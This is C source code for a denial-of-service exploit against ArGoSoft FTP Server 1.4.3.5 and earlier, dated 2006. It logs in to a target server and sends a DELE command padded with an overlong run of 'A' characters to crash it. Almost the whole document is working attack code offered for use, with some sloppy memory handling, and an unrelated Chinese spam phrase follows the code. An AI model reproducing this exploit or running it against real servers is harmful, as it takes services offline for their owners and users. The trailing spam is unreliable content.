/* Name: ArGoSoft FTP Server <= 1.4.3.5 Exploit Target: DoS Author: Lympex Date: 26/02/2006 Contact: + lympex[at]gmail[dot]com + http://L-Bytes.Tk */ #include #include #include #include void Banner() { printf("\n[+] ArGoSoft FTP Server <= 1.4.3.5 - DoS Exploit"); printf("\n[+] Coded by Lympex:"); printf("\n + Lympex[at]Gmail[dot]Com"); printf("\n + http://L-Bytes.Tk"); printf("\n================================================\n"); return; } int main(int argc, char *argv[]) { //data unsigned int MAX_SIZE=1024; char *Buf,Buffer[MAX_SIZE]; //connection const unsigned int Wait=1000; WSADATA wsaData; SOCKET Winsock; struct sockaddr_in Winsock_In; struct hostent *Ip; //start Banner(); if(argc!=5) {printf("\n[+] Usage: %s \n",argv[0]);return -1;} //attack printf("\n[*] Connecting: %s:%s ...",argv[1],argv[2]); WSAStartup(MAKEWORD(2,2), &wsaData); Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); if(Winsock==INVALID_SOCKET) {WSACleanup();printf("Error\n");return -1;} Ip=gethostbyname(argv[1]); Winsock_In.sin_port=htons((short)atoi(argv[2])); Winsock_In.sin_family=AF_INET; Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr))); if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR) {WSACleanup();printf("Error\n");return -1;} printf("OK"); //check in Buf=(char *)malloc(255*sizeof(char)); memset(Buf,0,sizeof(Buf));memset(Buffer,0,sizeof(Buffer)); printf("\n[*] Authenticating: %s:%s ...",argv[3],argv[4]); recv(Winsock,Buffer,MAX_SIZE,0); //user command realloc(Buf,strlen("USER ")+strlen(argv[3])+strlen("\n")); memset(Buf,0,sizeof(Buf));memset(Buffer,0,sizeof(Buffer)); strcpy(Buf,"USER ");strcat(Buf,argv[3]);strcat(Buf,"\n"); send(Winsock,Buf,strlen(Buf),0); recv(Winsock,Buffer,MAX_SIZE,0); //pass command realloc(Buf,strlen("PASS ")+strlen(argv[4])+strlen("\n")); memset(Buf,0,sizeof(Buf));memset(Buffer,0,sizeof(Buffer)); strcpy(Buf,"PASS ");strcat(Buf,argv[4]);strcat(Buf,"\n"); send(Winsock,Buf,strlen(Buf),0); recv(Winsock,Buffer,MAX_SIZE,0); //verify if(Buffer[0]!='2'){printf("Error\n");WSACleanup();return -1;} printf("OK"); //attack printf("\n[*] Attacking ..."); printf("\n -Sending EvilBuffer..."); char EvilBuffer[]="DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; send(Winsock,EvilBuffer,274,0); send(Winsock,"\n",2,0); printf("OK"); printf("\n -Waitting..."); Sleep(Wait); printf("OK"); WSACleanup(); printf("\n[*] Done!\n"); return 0; }

亚洲欧美在线